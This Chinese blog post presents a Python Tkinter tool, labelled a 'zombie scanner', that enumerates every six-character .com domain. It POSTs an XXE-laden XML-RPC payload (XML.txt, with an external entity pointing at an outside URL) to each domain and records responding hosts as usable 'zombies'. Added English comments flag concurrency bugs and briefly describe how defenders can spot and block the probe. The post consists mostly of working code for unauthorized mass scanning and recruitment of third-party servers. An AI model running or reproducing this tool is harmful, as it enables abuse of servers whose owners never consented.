在上篇文章《功能滥用漏洞研究》（CSDN博客）中讲了原理。
现在讲如何发现存在功能滥用漏洞的服务器：
import os
import array as arr
import threading
from threading import Thread
import socket
import time
import tkinter as tk
def abc():
    """Refresh the Tk status label once a second and checkpoint the counter.

    Reads the module globals ``str1``, ``w1``..``w6``, ``jian`` and ``var``;
    overwrites ``name.txt`` with the six counter digits (one per line, most
    significant first), which is the file the module reads back at import
    to resume.  Re-schedules itself through ``result.after``.
    """
    # Label text: the six-symbol name currently being probed, the hit count
    # and the live thread count (active_count() includes the main thread).
    var.set(str1[w6] + str1[w5] + str1[w4] + str1[w3] + str1[w2] + str1[w1] + '.com \n 已找到僵尸' + str(
        jian) + '个 \n 正在工作的线程' + str(threading.active_count()) + '\n')
    # The globals are read here with no synchronization against the worker
    # threads that mutate them, so the snapshot may straddle an increment.
    # 'w' truncates the file on every tick.
    with open('name.txt', 'w') as file:
        file.write(str(w6) + '\n' + str(w5) + '\n' + str(w4) + '\n' + str(w3) + '\n' + str(w2) + '\n' + str(w1) + '\n')
    # Tk timer: run again after 1000 ms on the GUI thread.
    result.after(1000, abc)
def callback():
    """Button handler: start as many ``run`` worker threads as typed in ``entry``.

    ``int(entry.get())`` raises ValueError for non-numeric input; nothing
    catches it here, so it surfaces in the Tk callback.  ``jian`` is declared
    global but never assigned in this function.
    """
    global jian
    # Pre-sized list used only as a thread-handle store: inputs above 100000
    # raise IndexError at t1[i].
    t1=list(range(0, 100000))
    content111 = int(entry.get())
    # Each Thread runs run() forever.  Threads are created with the default
    # daemon=False, so they keep the process alive after the window closes.
    for i in range(0, int(content111)):
        t1[i] = Thread(target=run)
        t1[i].start()
    # Start the periodic status refresh (abc() re-schedules itself).
    abc()
# Resume state: name.txt holds six integers, one per line, most significant
# first (the same layout abc() writes).  A missing file raises
# FileNotFoundError, fewer than six lines IndexError, non-integers ValueError,
# all at import time.
with open("name.txt", 'r', ) as file:
    content21 = file.read()
result12 = content21.split("\n")
# w1 is the least significant position, w6 the most significant.
w1=int(result12[5])
w2=int(result12[4])
w3=int(result12[3])
w4=int(result12[2])
w5=int(result12[1])
w6=int(result12[0])
# 36-symbol alphabet indexed 0..35.  Note the 'e','g','h','f' order: the
# enumeration is not plain alphabetical.
str1=arr.array('u', ['a', 'b', 'c', 'd', 'e','g','h','f','i','j','k','l','m', 'n', 'o', 'p', 'q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0'])
# Number of hosts whose status line was below 400 (incremented by run()).
jian=0
def run():
    """Worker loop: advance the shared six-digit base-36 counter, build
    ``<name>.com``, POST the contents of ``XML.txt`` to it on port 80 and
    append the URL to ``xkj.txt`` whenever the status line is below 400.

    Never returns.  Every error raised inside the ``try`` is swallowed and
    the loop continues; an exception outside the ``try`` (for example
    ``str1[k6]`` once ``w6`` passes 35, which has no wrap guard) ends the
    thread silently.  ``jian`` is incremented without synchronization.

    From a defender's view the probe is recognizable: POST / with the fixed
    legacy User-Agent below, bare-LF header lines, Connection: close, and an
    XML-RPC body carrying a DOCTYPE with an external entity.  Disabling DTD
    processing / external entity resolution in the server's XML parser and
    alerting on that body shape addresses it.
    """
    while True:
        # NOTE(review): a new Lock object is created on every iteration and
        # only ever acquired by this thread, so acquire/release here does not
        # serialize the counter update across threads.
        lock = threading.Lock()
        lock.acquire()
        global w1,w2,w3,w4,w5,w6,str1,jian
        # Base-36 odometer: w1 is the least significant digit; each digit
        # wraps from 35 to 0 and carries into the next.  w6 is never wrapped.
        w1 = w1 + 1
        if w1>35:
            w2 = w2 + 1
            w1=0
        if w2>35:
            w3=w3 + 1
            w2=0
        if w3>35:
            w4=w4 + 1
            w3=0
        if w4>35:
            w5=w5 + 1
            w4=0
        if w5>35:
            w6=w6 + 1
            w5=0
        # Local snapshot of the six digits for this probe.
        k1=w1
        k2=w2
        k3=w3
        k4=w4
        k5=w5
        k6=w6
        lock.release()
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Hostname, most significant digit first; indexing is outside the try.
        work=str1[k6]+str1[k5]+str1[k4]+str1[k3]+str1[k2]+str1[k1]+'.com'
        url = "http://"+work+"/"
        server_address = (work, 80)
        work = work.encode()
        try:
            # Blocking connect with the socket default (no) timeout; name
            # resolution happens here too.
            client_socket.connect(server_address)
            # Hand-built request: header lines end in bare LF, not CRLF.
            client_socket.sendall(b'POST / HTTP/1.1\n')
            client_socket.sendall(b'Host: '+work+ b' \n')
            client_socket.sendall(b'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\n')
            client_socket.sendall(b'Accept: */*\n')
            # The body file is re-read from disk on every probe.
            with open('XML.txt', 'r') as file:
                content = file.read()
            # Content-Length is the character count of the text, not the byte
            # length of content.encode(); the two differ for non-ASCII input.
            body = len(content)
            if (type(body) is int):
                body = '{}'.format(body)
            body = body.encode()
            client_socket.sendall(b'Content-Length: ' + body + b'\n')
            client_socket.sendall(b'Content-Type: application/x-www-form-urlencoded\n')
            client_socket.sendall(b"Connection: close\n\n")
            content = content.encode()
            # The trailing CRLFCRLF is sent beyond the declared Content-Length.
            client_socket.sendall(content + b"\r\n\r\n")
            # Only the first 1024 bytes of the reply are read.  The status code
            # is taken as the three characters after "HTTP/1.1"; a reply that
            # does not contain that token (e.g. HTTP/1.0) raises IndexError and
            # is handled as a failure below.
            data = client_socket.recv(1024)
            as2 = data.decode().split("HTTP/1.1")
            as3 = as2[1].strip()
            data = as3[0:3]
            data = int(data)
            # Any 1xx/2xx/3xx status counts as a hit.  The response body is not
            # inspected, so this only shows that the host answered the POST.
            if data < 400:
                jian=jian+1
                data = str(data)
                # NOTE(review): again a fresh Lock, so concurrent appends to
                # xkj.txt from different threads are not serialized.
                lock = threading.Lock()
                lock.acquire()
                with open('xkj.txt', "a") as file:
                    file.write(url+';XML;XML.txt\n')
                    # Redundant: the with block closes the file.
                    file.close()
                lock.release()
            else:
                data = str(data)
            # Closed on the success path only; when an exception is raised the
            # socket is left to garbage collection.
            client_socket.close()
        except Exception as e:
            # Swallows every error (refused connection, resolution failure,
            # parse errors).  result4 is computed but never used.
            result4 = str(e).split("\n")
            continue
# Unused ANSI escape sequences: status is shown in the Tk label, not the console.
clear_screen_sequence = '\033[2J'
move_cursor_sequence = '\033[H'
# Minimal Tk window: a count entry, a start button, a status label and a quit button.
root = tk.Tk()
root.title('僵尸扫描')
# The prompt says "进程" (process) but callback() starts threads.
tips = tk.Label(root, text='请输入进程数')
tips.grid(row=0)
# Input field: the thread count read by callback() via entry.get()
entry = tk.Entry(root)
entry.grid(row=0, column=1, padx=10, pady=5)
# Confirm button: starts the worker threads
confirm = tk.Button(root, text='确定', command=callback)
confirm.grid(row=1, column=1, padx=10, pady=5)
# Status text, rewritten once a second by abc()
var = tk.StringVar()
var.set('请输入数字!')
result = tk.Label(root, textvariable=var)
result.grid(row=2, column=0, padx=10, pady=5)
# Shadows the builtin quit().  root.quit only leaves mainloop; the
# non-daemon worker threads keep the process alive afterwards.
quit = tk.Button(root, text='退出', command=root.quit)
quit.grid(row=2, column=1, padx=10, pady=5)
root.mainloop()
其他文件
XML.txt
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY>
<!ENTITY xxe SYSTEM "http://site" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
name.txt
0
0
0
0
0
0
原理
依次扫描从aaaaaa.com到zzzzzz.com的网站，检查是否存在漏洞